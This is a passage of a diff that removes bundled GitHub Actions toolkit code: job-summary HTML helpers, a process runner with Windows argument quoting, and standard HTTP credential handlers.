Check if the file has correct read/write permissions.`); - } - this._filePath = pathFromEnv; - return this._filePath; - }); - } - /** - * Wraps content in an HTML tag, adding any HTML attributes - * - * @param {string} tag HTML tag to wrap - * @param {string | null} content content within the tag - * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add - * - * @returns {string} content wrapped in HTML element - */ - wrap(tag, content, attrs = {}) { - const htmlAttrs = Object.entries(attrs) - .map(([key, value]) => ` ${key}="${value}"`) - .join(''); - if (!content) { - return `<${tag}${htmlAttrs}>`; - } - return `<${tag}${htmlAttrs}>${content}`; - } - /** - * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. - * - * @param {SummaryWriteOptions} [options] (optional) options for write operation - * - * @returns {Promise

} summary instance - */ - write(options) { - return __awaiter(this, void 0, void 0, function* () { - const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); - const filePath = yield this.filePath(); - const writeFunc = overwrite ? writeFile : appendFile; - yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); - return this.emptyBuffer(); - }); - } - /** - * Clears the summary buffer and wipes the summary file - * - * @returns {Summary} summary instance - */ - clear() { - return __awaiter(this, void 0, void 0, function* () { - return this.emptyBuffer().write({ overwrite: true }); - }); - } - /** - * Returns the current summary buffer as a string - * - * @returns {string} string of summary buffer - */ - stringify() { - return this._buffer; - } - /** - * If the summary buffer is empty - * - * @returns {boolen} true if the buffer is empty - */ - isEmptyBuffer() { - return this._buffer.length === 0; - } - /** - * Resets the summary buffer without writing to summary file - * - * @returns {Summary} summary instance - */ - emptyBuffer() { - this._buffer = ''; - return this; - } - /** - * Adds raw text to the summary buffer - * - * @param {string} text content to add - * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) - * - * @returns {Summary} summary instance - */ - addRaw(text, addEOL = false) { - this._buffer += text; - return addEOL ? 
this.addEOL() : this; - } - /** - * Adds the operating system-specific end-of-line marker to the buffer - * - * @returns {Summary} summary instance - */ - addEOL() { - return this.addRaw(os_1.EOL); - } - /** - * Adds an HTML codeblock to the summary buffer - * - * @param {string} code content to render within fenced code block - * @param {string} lang (optional) language to syntax highlight code - * - * @returns {Summary} summary instance - */ - addCodeBlock(code, lang) { - const attrs = Object.assign({}, (lang && { lang })); - const element = this.wrap('pre', this.wrap('code', code), attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML list to the summary buffer - * - * @param {string[]} items list of items to render - * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) - * - * @returns {Summary} summary instance - */ - addList(items, ordered = false) { - const tag = ordered ? 'ol' : 'ul'; - const listItems = items.map(item => this.wrap('li', item)).join(''); - const element = this.wrap(tag, listItems); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML table to the summary buffer - * - * @param {SummaryTableCell[]} rows table rows - * - * @returns {Summary} summary instance - */ - addTable(rows) { - const tableBody = rows - .map(row => { - const cells = row - .map(cell => { - if (typeof cell === 'string') { - return this.wrap('td', cell); - } - const { header, data, colspan, rowspan } = cell; - const tag = header ? 
'th' : 'td'; - const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); - return this.wrap(tag, data, attrs); - }) - .join(''); - return this.wrap('tr', cells); - }) - .join(''); - const element = this.wrap('table', tableBody); - return this.addRaw(element).addEOL(); - } - /** - * Adds a collapsable HTML details element to the summary buffer - * - * @param {string} label text for the closed state - * @param {string} content collapsable content - * - * @returns {Summary} summary instance - */ - addDetails(label, content) { - const element = this.wrap('details', this.wrap('summary', label) + content); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML image tag to the summary buffer - * - * @param {string} src path to the image you to embed - * @param {string} alt text description of the image - * @param {SummaryImageOptions} options (optional) addition image attributes - * - * @returns {Summary} summary instance - */ - addImage(src, alt, options) { - const { width, height } = options || {}; - const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); - const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML section heading element - * - * @param {string} text heading text - * @param {number | string} [level=1] (optional) the heading level, default: 1 - * - * @returns {Summary} summary instance - */ - addHeading(text, level) { - const tag = `h${level}`; - const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) - ? tag - : 'h1'; - const element = this.wrap(allowedTag, text); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML thematic break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addSeparator() { - const element = this.wrap('hr', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML line break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addBreak() { - const element = this.wrap('br', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML blockquote to the summary buffer - * - * @param {string} text quote text - * @param {string} cite (optional) citation url - * - * @returns {Summary} summary instance - */ - addQuote(text, cite) { - const attrs = Object.assign({}, (cite && { cite })); - const element = this.wrap('blockquote', text, attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML anchor tag to the summary buffer - * - * @param {string} text link text/content - * @param {string} href hyperlink - * - * @returns {Summary} summary instance - */ - addLink(text, href) { - const element = this.wrap('a', text, { href }); - return this.addRaw(element).addEOL(); - } -} -const _summary = new Summary(); -/** - * @deprecated use `core.summary` - */ -exports.markdownSummary = _summary; -exports.summary = _summary; -//# sourceMappingURL=summary.js.map - -/***/ }), - -/***/ 5278: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toCommandProperties = exports.toCommandValue = void 0; -/** - * Sanitizes an input into a string so it can be passed into issueCommand safely - * @param input input to sanitize into a string - */ -function toCommandValue(input) { - if (input === null || input === undefined) { - return ''; - } - else if (typeof input === 'string' || input instanceof String) { - return input; - } - return JSON.stringify(input); -} -exports.toCommandValue = toCommandValue; -/** - * - * @param annotationProperties - * @returns The command properties to send with the actual annotation command - * See IssueCommandProperties: 
https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 - */ -function toCommandProperties(annotationProperties) { - if (!Object.keys(annotationProperties).length) { - return {}; - } - return { - title: annotationProperties.title, - file: annotationProperties.file, - line: annotationProperties.startLine, - endLine: annotationProperties.endLine, - col: annotationProperties.startColumn, - endColumn: annotationProperties.endColumn - }; -} -exports.toCommandProperties = toCommandProperties; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 1514: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getExecOutput = exports.exec = void 0; -const string_decoder_1 = __nccwpck_require__(1576); -const tr = __importStar(__nccwpck_require__(8159)); -/** - * Exec a command. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. - * @param options optional exec options. See ExecOptions - * @returns Promise exit code - */ -function exec(commandLine, args, options) { - return __awaiter(this, void 0, void 0, function* () { - const commandArgs = tr.argStringToArray(commandLine); - if (commandArgs.length === 0) { - throw new Error(`Parameter 'commandLine' cannot be null or empty.`); - } - // Path to tool to execute should be first arg - const toolPath = commandArgs[0]; - args = commandArgs.slice(1).concat(args || []); - const runner = new tr.ToolRunner(toolPath, args, options); - return runner.exec(); - }); -} -exports.exec = exec; -/** - * Exec a command and get the output. - * Output will be streamed to the live console. - * Returns promise with the exit code and collected stdout and stderr - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. 
- * @param options optional exec options. See ExecOptions - * @returns Promise exit code, stdout, and stderr - */ -function getExecOutput(commandLine, args, options) { - var _a, _b; - return __awaiter(this, void 0, void 0, function* () { - let stdout = ''; - let stderr = ''; - //Using string decoder covers the case where a mult-byte character is split - const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); - const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); - const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; - const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; - const stdErrListener = (data) => { - stderr += stderrDecoder.write(data); - if (originalStdErrListener) { - originalStdErrListener(data); - } - }; - const stdOutListener = (data) => { - stdout += stdoutDecoder.write(data); - if (originalStdoutListener) { - originalStdoutListener(data); - } - }; - const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); - const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); - //flush any remaining characters - stdout += stdoutDecoder.end(); - stderr += stderrDecoder.end(); - return { - exitCode, - stdout, - stderr - }; - }); -} -exports.getExecOutput = getExecOutput; -//# sourceMappingURL=exec.js.map - -/***/ }), - -/***/ 8159: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.argStringToArray = exports.ToolRunner = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const events = __importStar(__nccwpck_require__(2361)); -const child = __importStar(__nccwpck_require__(2081)); -const path = __importStar(__nccwpck_require__(1017)); -const io = __importStar(__nccwpck_require__(7436)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -const timers_1 = __nccwpck_require__(9512); -/* eslint-disable @typescript-eslint/unbound-method */ -const IS_WINDOWS = process.platform === 'win32'; -/* - * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. - */ -class ToolRunner extends events.EventEmitter { - constructor(toolPath, args, options) { - super(); - if (!toolPath) { - throw new Error("Parameter 'toolPath' cannot be null or empty."); - } - this.toolPath = toolPath; - this.args = args || []; - this.options = options || {}; - } - _debug(message) { - if (this.options.listeners && this.options.listeners.debug) { - this.options.listeners.debug(message); - } - } - _getCommandString(options, noPrefix) { - const toolPath = this._getSpawnFileName(); - const args = this._getSpawnArgs(options); - let cmd = noPrefix ? 
'' : '[command]'; // omit prefix when piped to a second tool - if (IS_WINDOWS) { - // Windows + cmd file - if (this._isCmdFile()) { - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows + verbatim - else if (options.windowsVerbatimArguments) { - cmd += `"${toolPath}"`; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows (regular) - else { - cmd += this._windowsQuoteCmdArg(toolPath); - for (const a of args) { - cmd += ` ${this._windowsQuoteCmdArg(a)}`; - } - } - } - else { - // OSX/Linux - this can likely be improved with some form of quoting. - // creating processes on Unix is fundamentally different than Windows. - // on Unix, execvp() takes an arg array. - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - return cmd; - } - _processLineBuffer(data, strBuffer, onLine) { - try { - let s = strBuffer + data.toString(); - let n = s.indexOf(os.EOL); - while (n > -1) { - const line = s.substring(0, n); - onLine(line); - // the rest of the string ... - s = s.substring(n + os.EOL.length); - n = s.indexOf(os.EOL); - } - return s; - } - catch (err) { - // streaming lines to console is best effort. Don't fail a build. - this._debug(`error processing line. Failed with error ${err}`); - return ''; - } - } - _getSpawnFileName() { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - return process.env['COMSPEC'] || 'cmd.exe'; - } - } - return this.toolPath; - } - _getSpawnArgs(options) { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; - for (const a of this.args) { - argline += ' '; - argline += options.windowsVerbatimArguments - ? 
a - : this._windowsQuoteCmdArg(a); - } - argline += '"'; - return [argline]; - } - } - return this.args; - } - _endsWith(str, end) { - return str.endsWith(end); - } - _isCmdFile() { - const upperToolPath = this.toolPath.toUpperCase(); - return (this._endsWith(upperToolPath, '.CMD') || - this._endsWith(upperToolPath, '.BAT')); - } - _windowsQuoteCmdArg(arg) { - // for .exe, apply the normal quoting rules that libuv applies - if (!this._isCmdFile()) { - return this._uvQuoteCmdArg(arg); - } - // otherwise apply quoting rules specific to the cmd.exe command line parser. - // the libuv rules are generic and are not designed specifically for cmd.exe - // command line parser. - // - // for a detailed description of the cmd.exe command line parser, refer to - // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 - // need quotes for empty arg - if (!arg) { - return '""'; - } - // determine whether the arg needs to be quoted - const cmdSpecialChars = [ - ' ', - '\t', - '&', - '(', - ')', - '[', - ']', - '{', - '}', - '^', - '=', - ';', - '!', - "'", - '+', - ',', - '`', - '~', - '|', - '<', - '>', - '"' - ]; - let needsQuotes = false; - for (const char of arg) { - if (cmdSpecialChars.some(x => x === char)) { - needsQuotes = true; - break; - } - } - // short-circuit if quotes not needed - if (!needsQuotes) { - return arg; - } - // the following quoting rules are very similar to the rules that by libuv applies. - // - // 1) wrap the string in quotes - // - // 2) double-up quotes - i.e. " => "" - // - // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately - // doesn't work well with a cmd.exe command line. - // - // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. 
- // for example, the command line: - // foo.exe "myarg:""my val""" - // is parsed by a .NET console app into an arg array: - // [ "myarg:\"my val\"" ] - // which is the same end result when applying libuv quoting rules. although the actual - // command line from libuv quoting rules would look like: - // foo.exe "myarg:\"my val\"" - // - // 3) double-up slashes that precede a quote, - // e.g. hello \world => "hello \world" - // hello\"world => "hello\\""world" - // hello\\"world => "hello\\\\""world" - // hello world\ => "hello world\\" - // - // technically this is not required for a cmd.exe command line, or the batch argument parser. - // the reasons for including this as a .cmd quoting rule are: - // - // a) this is optimized for the scenario where the argument is passed from the .cmd file to an - // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. - // - // b) it's what we've been doing previously (by deferring to node default behavior) and we - // haven't heard any complaints about that aspect. - // - // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be - // escaped when used on the command line directly - even though within a .cmd file % can be escaped - // by using %%. - // - // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts - // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. - // - // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would - // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the - // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args - // to an external program. - // - // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. - // % can be escaped within a .cmd file. 
- let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; // double the slash - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '"'; // double the quote - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _uvQuoteCmdArg(arg) { - // Tool runner wraps child_process.spawn() and needs to apply the same quoting as - // Node in certain cases where the undocumented spawn option windowsVerbatimArguments - // is used. - // - // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, - // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), - // pasting copyright notice from Node within this function: - // - // Copyright Joyent, Inc. and other Node contributors. All rights reserved. - // - // Permission is hereby granted, free of charge, to any person obtaining a copy - // of this software and associated documentation files (the "Software"), to - // deal in the Software without restriction, including without limitation the - // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - // sell copies of the Software, and to permit persons to whom the Software is - // furnished to do so, subject to the following conditions: - // - // The above copyright notice and this permission notice shall be included in - // all copies or substantial portions of the Software. - // - // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE - // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - // IN THE SOFTWARE. - if (!arg) { - // Need double quotation for empty argument - return '""'; - } - if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { - // No quotation needed - return arg; - } - if (!arg.includes('"') && !arg.includes('\\')) { - // No embedded double quotes or backslashes, so I can just wrap - // quote marks around the whole thing. - return `"${arg}"`; - } - // Expected input/output: - // input : hello"world - // output: "hello\"world" - // input : hello""world - // output: "hello\"\"world" - // input : hello\world - // output: hello\world - // input : hello\\world - // output: hello\\world - // input : hello\"world - // output: "hello\\\"world" - // input : hello\\"world - // output: "hello\\\\\"world" - // input : hello world\ - // output: "hello world\\" - note the comment in libuv actually reads "hello world\" - // but it appears the comment is wrong, it should be "hello world\\" - let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '\\'; - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _cloneExecOptions(options) { - options = options || {}; - const result = { - cwd: options.cwd || process.cwd(), - env: options.env || process.env, - silent: options.silent || false, - windowsVerbatimArguments: options.windowsVerbatimArguments || false, - failOnStdErr: options.failOnStdErr || false, - ignoreReturnCode: options.ignoreReturnCode || false, - delay: options.delay || 10000 - }; - 
result.outStream = options.outStream || process.stdout; - result.errStream = options.errStream || process.stderr; - return result; - } - _getSpawnOptions(options, toolPath) { - options = options || {}; - const result = {}; - result.cwd = options.cwd; - result.env = options.env; - result['windowsVerbatimArguments'] = - options.windowsVerbatimArguments || this._isCmdFile(); - if (options.windowsVerbatimArguments) { - result.argv0 = `"${toolPath}"`; - } - return result; - } - /** - * Exec a tool. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param tool path to tool to exec - * @param options optional exec options. See ExecOptions - * @returns number - */ - exec() { - return __awaiter(this, void 0, void 0, function* () { - // root the tool path if it is unrooted and contains relative pathing - if (!ioUtil.isRooted(this.toolPath) && - (this.toolPath.includes('/') || - (IS_WINDOWS && this.toolPath.includes('\\')))) { - // prefer options.cwd if it is specified, however options.cwd may also need to be rooted - this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); - } - // if the tool is only a file name, then resolve it from the PATH - // otherwise verify it exists (add extension on Windows if necessary) - this.toolPath = yield io.which(this.toolPath, true); - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - this._debug(`exec tool: ${this.toolPath}`); - this._debug('arguments:'); - for (const arg of this.args) { - this._debug(` ${arg}`); - } - const optionsNonNull = this._cloneExecOptions(this.options); - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); - } - const state = new ExecState(optionsNonNull, this.toolPath); - state.on('debug', (message) => { - this._debug(message); - }); - if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { - 
return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); - } - const fileName = this._getSpawnFileName(); - const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); - let stdbuffer = ''; - if (cp.stdout) { - cp.stdout.on('data', (data) => { - if (this.options.listeners && this.options.listeners.stdout) { - this.options.listeners.stdout(data); - } - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(data); - } - stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { - if (this.options.listeners && this.options.listeners.stdline) { - this.options.listeners.stdline(line); - } - }); - }); - } - let errbuffer = ''; - if (cp.stderr) { - cp.stderr.on('data', (data) => { - state.processStderr = true; - if (this.options.listeners && this.options.listeners.stderr) { - this.options.listeners.stderr(data); - } - if (!optionsNonNull.silent && - optionsNonNull.errStream && - optionsNonNull.outStream) { - const s = optionsNonNull.failOnStdErr - ? 
optionsNonNull.errStream - : optionsNonNull.outStream; - s.write(data); - } - errbuffer = this._processLineBuffer(data, errbuffer, (line) => { - if (this.options.listeners && this.options.listeners.errline) { - this.options.listeners.errline(line); - } - }); - }); - } - cp.on('error', (err) => { - state.processError = err.message; - state.processExited = true; - state.processClosed = true; - state.CheckComplete(); - }); - cp.on('exit', (code) => { - state.processExitCode = code; - state.processExited = true; - this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); - state.CheckComplete(); - }); - cp.on('close', (code) => { - state.processExitCode = code; - state.processExited = true; - state.processClosed = true; - this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); - state.CheckComplete(); - }); - state.on('done', (error, exitCode) => { - if (stdbuffer.length > 0) { - this.emit('stdline', stdbuffer); - } - if (errbuffer.length > 0) { - this.emit('errline', errbuffer); - } - cp.removeAllListeners(); - if (error) { - reject(error); - } - else { - resolve(exitCode); - } - }); - if (this.options.input) { - if (!cp.stdin) { - throw new Error('child process missing stdin'); - } - cp.stdin.end(this.options.input); - } - })); - }); - } -} -exports.ToolRunner = ToolRunner; -/** - * Convert an arg string to an array of args. Handles escaping - * - * @param argString string of arguments - * @returns string[] array of arguments - */ -function argStringToArray(argString) { - const args = []; - let inQuotes = false; - let escaped = false; - let arg = ''; - function append(c) { - // we only escape double quotes. 
- if (escaped && c !== '"') { - arg += '\\'; - } - arg += c; - escaped = false; - } - for (let i = 0; i < argString.length; i++) { - const c = argString.charAt(i); - if (c === '"') { - if (!escaped) { - inQuotes = !inQuotes; - } - else { - append(c); - } - continue; - } - if (c === '\\' && escaped) { - append(c); - continue; - } - if (c === '\\' && inQuotes) { - escaped = true; - continue; - } - if (c === ' ' && !inQuotes) { - if (arg.length > 0) { - args.push(arg); - arg = ''; - } - continue; - } - append(c); - } - if (arg.length > 0) { - args.push(arg.trim()); - } - return args; -} -exports.argStringToArray = argStringToArray; -class ExecState extends events.EventEmitter { - constructor(options, toolPath) { - super(); - this.processClosed = false; // tracks whether the process has exited and stdio is closed - this.processError = ''; - this.processExitCode = 0; - this.processExited = false; // tracks whether the process has exited - this.processStderr = false; // tracks whether stderr was written to - this.delay = 10000; // 10 seconds - this.done = false; - this.timeout = null; - if (!toolPath) { - throw new Error('toolPath must not be empty'); - } - this.options = options; - this.toolPath = toolPath; - if (options.delay) { - this.delay = options.delay; - } - } - CheckComplete() { - if (this.done) { - return; - } - if (this.processClosed) { - this._setResult(); - } - else if (this.processExited) { - this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); - } - } - _debug(message) { - this.emit('debug', message); - } - _setResult() { - // determine whether there is an error - let error; - if (this.processExited) { - if (this.processError) { - error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. 
Error: ${this.processError}`); - } - else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { - error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); - } - else if (this.processStderr && this.options.failOnStdErr) { - error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); - } - } - // clear the timeout - if (this.timeout) { - clearTimeout(this.timeout); - this.timeout = null; - } - this.done = true; - this.emit('done', error, this.processExitCode); - } - static HandleTimeout(state) { - if (state.done) { - return; - } - if (!state.processClosed && state.processExited) { - const message = `The STDIO streams did not close within ${state.delay / - 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; - state._debug(message); - } - state._setResult(); - } -} -//# sourceMappingURL=toolrunner.js.map - -/***/ }), - -/***/ 5526: -/***/ (function(__unused_webpack_module, exports) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; -class BasicCredentialHandler { - constructor(username, password) { - this.username = username; - this.password = password; - } - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BasicCredentialHandler = BasicCredentialHandler; -class BearerCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Bearer ${this.token}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BearerCredentialHandler = BearerCredentialHandler; -class PersonalAccessTokenCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic 
${Buffer.from(`PAT:${this.token}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; -//# sourceMappingURL=auth.js.map - -/***/ }), - -/***/ 6255: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -/* eslint-disable @typescript-eslint/no-explicit-any */ -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
